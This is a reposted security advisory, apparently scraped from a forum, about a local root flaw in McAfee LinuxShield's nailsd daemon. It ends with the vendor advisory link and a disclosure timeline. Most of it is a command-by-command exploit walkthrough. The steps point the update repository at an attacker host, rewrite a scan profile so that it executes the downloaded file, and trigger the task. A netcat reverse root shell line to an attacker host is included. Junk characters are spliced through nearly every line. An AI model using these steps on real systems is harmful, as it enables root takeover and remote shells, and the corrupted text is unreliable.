    . G# F) y3 q: E( R+ Z. [* d"nailsd" daemon, which listens on port 65443/tcp, to do5 ?/ q) c  b* C8 x- u
    configuration
    ! R  @# u) e' s6 A4 Mchanges, query the configuration and execute tasks.
    . S) ~7 `: z) b1 n) f: B/ M/ V, v& ]9 S& W6 A# o
    Each user, which can login to the victim box, can also authenticate0 K3 G+ _5 A- z& H+ K
    it self to the "nailsd" and can do configuration changes and
    0 J& {$ N2 b7 Sexecute5 K  R- i" X, `7 s1 T1 s# p' @
    tasks with root privileges.
    3 R  {' e! K2 R, b/ I" T+ _( g
    ; D+ z7 b" h: j: d& s) ?A direct execution of commands is not possible, but it is possible to
    - L6 Q; z8 ?( h7 mdownload and execute code through manipulation of the config and% `4 f+ q/ V# k* {. G# s) ]# H& t2 o- F
    execute schedule tasks of the LinuxShield.
    " x# F. g$ {9 W8 a) y2 Q3 ^$ C0 \
    $ D7 L: g, d9 m
    / h6 |% i  E; C- M7 N4 `# o' zwalk-through (after the TLS handshake):# H. W" W! A7 |4 \+ n
    +--------------------------------------
    5 [% K6 B) C6 [
    + R* _9 a7 C) c  Qnailsd > +OK welcome to the NAILS Statistics Service
    4 C- v$ |- b5 S! c& Aattacker> auth <user> <pass>/ t! X; Q4 g0 ?
    nailsd > +OK successful authentication
    * K  [7 {+ b8 |- [. @) t/ N: H  i6 Y9 W. T7 u1 B
    # Set the Attacker repository to download our code from a httpd
    2 |) w7 ]; i+ X* u0 t# (catalog.z)' ]6 [' V1 J4 ^' _$ ^% w9 `  u
    #---------------------------------------------------------------
    : x1 w( S* L: [& T& vattacker> db set 1 _table=repository status=1 siteList=<?xml version
    & X0 ]: U; K/ \+ s% f="1.0" encoding="UTF-8"?><ns:SiteLists
    " E5 G5 w! A. g% ?4 L# I1 `. O1 B! Qxmlns:ns="naSiteLi
    8 d2 k9 F& D# ?1 l4 Z$ Lst" GlobalVersion="20030131003110"% }, f2 K4 E8 l$ l) J- R
    LocalVersion="200912093 H$ N1 `- O2 W0 X7 P/ k2 T
    161903" Type="Client"><SiteList
    ; V1 C( w% [* ~- W: F0 o: {  \Default="1" Name="SomeGU8 g) W3 [6 ]% [
    ID"><HttpSite Type="repository"5 q' ~& i0 I1 {3 a' B7 U
    Name="EvilRepo" Order="12 g7 S" R0 B9 N0 ^- I2 X- {
    " Server="<attackerhost>:80"
    ' P% [' j9 L7 a/ Y# E" }Enabled="1" Local="1"><Rela) G$ N1 U( M- M. @  w

    1 e# ?0 q6 d$ x7 R: ]* mtivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
    # c& |  H) t& Y- a/ S+ `rName></
    5 S) i! R; g$ H% TUserName><Password
    2 B8 \' Q2 N0 ]) [+ _! GEncrypted="0"/></HttpSite></SiteList></
    ( d( g1 n8 ^+ n) O' kns:SiteLists> _cmd=update
    5 q, v6 v' `7 l+ x- e+ X$ f2 Q5 Gnailsd > +OK database changes buffered.
    . V- p* q  l' K  N5 _% m) X+ i! U  a
    . I3 n& r1 T9 H+ [1 a: a# Execute task to set the attacker repository  C: B1 h; i+ i. y1 A
    #---------------------------------------------------------------& `5 `  X8 e2 Q$ ~, S4 T
    attacker> task setsitelist
    8 J8 b( I+ q, E9 pnailsd > +OK setting sitelist from CMA.
    0 M! C$ e2 Y4 ~' k9 n) T0 y1 Z& D
    ) s. [. u1 A, ~+ u, v* @  \# Execute the default Update task to download the code! p4 T$ p- r; l9 s% c) h5 g, O3 \
    #---------------------------------------------------------------9 ?2 t) f% d0 Z. c
    attacker> task nstart LinuxShield Update
    4 `6 T; ^- [0 ~nailsd > +OK task LinuxShield Update starting. h: P5 r" z& G, t7 s2 f, L

      F7 \6 L7 m( f2 l" E' Y# Create a Scan profile, which executes our code. The profiles are& k. ^% T' Q& |* `8 |. l
    # not stored in the database.
    0 u1 V) ?0 i+ R8 a# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    8 x6 `* [* A, t$ w  M#---------------------------------------------------------------
    ; v4 Z2 b0 Z& }  V" r: uattacker> sconf ODS_99 begin
    " e* {: k# `- y( Bnailsd > +OK 1260400888
    , a3 r4 I" v' t% @* Y
    & c, b2 C/ i  b+ [3 ]. e; I# Set the variable "nailsd.profile.ODS_99.scannerPath" to the
    ! D" x0 f6 A! G# i; J$ wpath
    # F+ F% H4 y; B9 |) q  R# where our earlier downloaded catalog.z file is stored.
    7 ~3 H: ^7 w( s; _4 q/ L$ R* B" G# (/opt/McAfee/cma/scratch/update/catalog.z)
    ) q  g! I0 |; _#---------------------------------------------------------------/ ]6 o8 q9 L6 [3 ]
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=7 \2 J) e1 a2 k# N# F+ l
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    / c! e3 N' h. b& T2 ~! U2 P$ ~DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=, [8 q* }: V' w5 Y& J% Z
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
    ' K0 N; g# Z: g. W/ aine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
    7 }! ?4 B. j( b6 Mfile.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
    ! `" S+ R2 e3 C2 w% x. Z6 P& s$ air=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en; W+ n2 A* H. M
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    * D' G' x3 x1 J/ Z; J* x; S; S% @.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
    ) O3 K) A1 q- eristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
    , W0 D4 k& C9 i( U+ n* oe nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_991 l+ F( u  y% f: H
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi7 l  {6 b* r5 F
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil, _- \* `4 A* k8 U8 W" w
    dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin8 Z! o0 c2 n/ H
    e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
    6 \# A) R7 ^9 @( k/ ?ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    ; \2 U" s. Z/ N- jo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile0 @0 H* e1 U, a  D, b
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    / i# r% y) R* H2 q+ p$ w, L& {rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    2 i6 _# [- R8 \4 b" ]4 mch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100( z3 k  t9 H& n( c
    00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    2 m' ]8 v8 Y" q7 o( y6 sODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    ! o9 @1 c4 K2 ]( a0 vter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    . |' ^5 t; u" Inailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    , L2 P$ v" \+ B. |ofile.ODS_99.filter.extensions.type=extension nailsd.profil3 }' l$ F2 G& A0 C# L: L/ H  d3 `
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99( K. `! ]' t' ~
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
    % c9 Y/ ?! v% S- ]+ Vaction.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    6 }' Y7 s# U% {" Q  v# oecondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
    ' V% b. h1 t; I! sss nailsd.profile.ODS_99.action.error=Block4 Z1 G2 o" e  @" }# |8 b
    nailsd > +OK configuration changes buffered& R9 [- }4 s+ H( f/ |# d2 v: ]
    attacker> sconf ODS_99 commit 1260400888
    3 a! s9 g' i( w% x$ cnailsd > +OK configuration changes stored
    ) e3 n: D( P/ X1 y' a3 t+ |3 X2 g: O
    # Set a scan task with the manipulated profile to execute the code' H) y) b1 H  G) g; N5 X8 z: X9 |. t
    #---------------------------------------------------------------1 a" l; w% B6 m. c3 H. o" w4 e
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
      g4 T5 E9 A3 L8 q" K3 rpe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    - u+ Z$ _* C" Amp;exclude:false timetable=type=unscheduled taskResults=0 i7 K/ O0 t( L1 [  B& E' X
    _lastRun=1260318482 status=Stopped _cmd=insert
    ! `8 V- T* i( e0 Y3 E1 snailsd > +OK database changes buffered
    & o9 d, a. N5 S6 u% m$ N* a2 S8 |5 Z
    - L; h) _6 Y9 U: v7 c0 p: u# Execute scan task to execute the code
    1 d7 ?# W; w, ?  G, }& }8 J+ `2 o#---------------------------------------------------------------
      q7 n4 W3 X; N# G% n8 V9 yattacker> task nstart Evil Task
    # Y% Z7 P# b6 Q2 V7 U' e. {
    , C; y9 K- |2 ]) T' X) ^) o0 z+-------------------------------------- walk-through EOF# H. K2 R2 O1 T2 {  e/ ]. r+ |
    ( Z2 S' z/ m: n3 p, `, e

    5 N1 v7 n3 R: U: p- o' I' T) _' bTo get a reverse root shell place something like this in the catalog.z# n& j- [6 M4 C0 k% d
    , d7 d" o, V8 Z8 g3 R
    --- snip ---
    2 ?& ]$ [: G+ a#!/bin/sh$ S+ \) ?1 [) K" l3 `( d7 j0 P- C
    nc -nv <attacker_host> 4444 -e /bin/sh2 [$ K. O. c) t& _" g
    --- /snip ---
    $ o0 [, r& T4 `* b' {+ K( L3 f" E4 k! {9 u' A4 `+ Y# w1 d

    7 D# z" X1 k6 l6 k
    ) S2 r6 R) \% a, k9 tProof of Concept :
    $ Q" C9 ^5 _- H! E1 i- N. m+ D==================) I  `' e  G1 Y1 C1 r( \6 ~" u

    $ o  _* `! q% Q" Ihttp://inj3ct0r.com/sploits/11165.tar.gz9 {% y# z; m' z, r

    4 q" w; B2 m3 k; `& }+ d) @& J" Z5 S! ^1 |( f- C
    $ H) D! T# C0 Y# n' n0 o0 a
    Solution:5 b( k# B0 x- B, v' V, b
    =========
    - T( i" d  C8 e' A% O! A4 {9 U; [. f% b) [' _$ w: {- ]
    McAfee Advisory$ G) Y  }0 `; A
    +--------------
    , |; a$ k1 |) ]) T0 E, g; _1 Mhttps://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007. S8 [6 r& a1 U* ^7 ^# n8 _# Y5 |

    6 O' g' S2 S$ p9 S' J& b5 h4 O# b
    3 Y0 e" U7 J6 ?1 y+ U: J- b3 V- u& n) C( T# L  t* @
    Disclosure Timeline (YYYY/MM/DD):4 [: H' v( A' b& e+ T9 y
    =================================% }2 R9 U6 @0 U6 L
    / l  |% Q( X2 ^  Q$ F) m
    2009.12.07: Vulnerability found
    * K9 N2 w' k7 J2010.02.03: Asked vendor for a PGP key
    # p( X3 B9 c9 w3 S' E, j2 i; W! a2010.02.05: Vendor sent his PGP key: Q2 A, p4 M( `' \) [) v8 }
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
    : m" i6 n8 ^6 x- C" w  K4 E: Sdate (2010.02.18) to Vendor& N3 @  r# e6 U
    2010.02.05: Vendor acknowledges the reception of the advisory7 k! |" U  W( N( E0 Z
    2010.02.16: Ask for a status update, because the planned release date is
    1 }7 r/ n& q$ K( j2 }2010.02.18.* {( n- ~- j% g% D  X- t1 |
    2010.02.16: Vendor response that, they are currently working on a patch% m' S7 }7 Y2 f% _! \, d2 V
    2010.02.17: Changed release date to 2010.02.25.. j" w. _! a! h# q
    2010.02.22: Vendor gives a status update, that they are able to release2 d! W/ C& |. C, \( m; V  S
    the patch on 2010.02.25.
    , L  U4 T' V: M9 O" w2010.02.24: Ask for a list of affected products and the advisory url.% O8 L8 M: N6 y+ r
    2010.02.24: Vendor sends the list.4 `, {# R# |( {1 Y' Z, g1 f. C& |
    2010.03.02: Release of this Advisory% n6 S8 r+ Z0 b

      D( i5 b( q( @- K& O- o& u5 F( o6 j# S/ z% ^" x
    + y& r" q# y; @0 F% |

    # l1 q5 Q$ U; _/ W- i- y+ N$ m8 |! x. P% U0 a) j' K

    3 R7 C( K6 m" J4 ^  }' H! C. V. p2 v. O

    9 Y" j4 W/ n' n6 z. k
    : o" i# ~  i& |6 b" j( k' G
      z* R! f# u: t- o9 o
    # b* g' L; X9 ^; [7 y, @+ }* n! G: H
    * O$ h, W! F3 K- w
    * h" C& n$ P- O
    8 `6 ^' R$ [) y4 R" K' Z) f. r. |
    , \3 I2 g" j/ d: u$ ~2 W8 h* `  m& h9 V
    1 _+ g( c3 B/ ]: L  W) w% H

    7 w* i! ?7 S( t" i; G8 J
    8 ~; z- _# Z: I. z. U( A$ t# c6 c8 C

    ' ~' b- \/ C' [1 R* J公告:https://www.sitedirsec.com公布最新漏洞,请关注




    欢迎光临 非安全中国网-官方论坛{sitedirsec} (http://www.sitedirsec.com/) Powered by Discuz! 7.2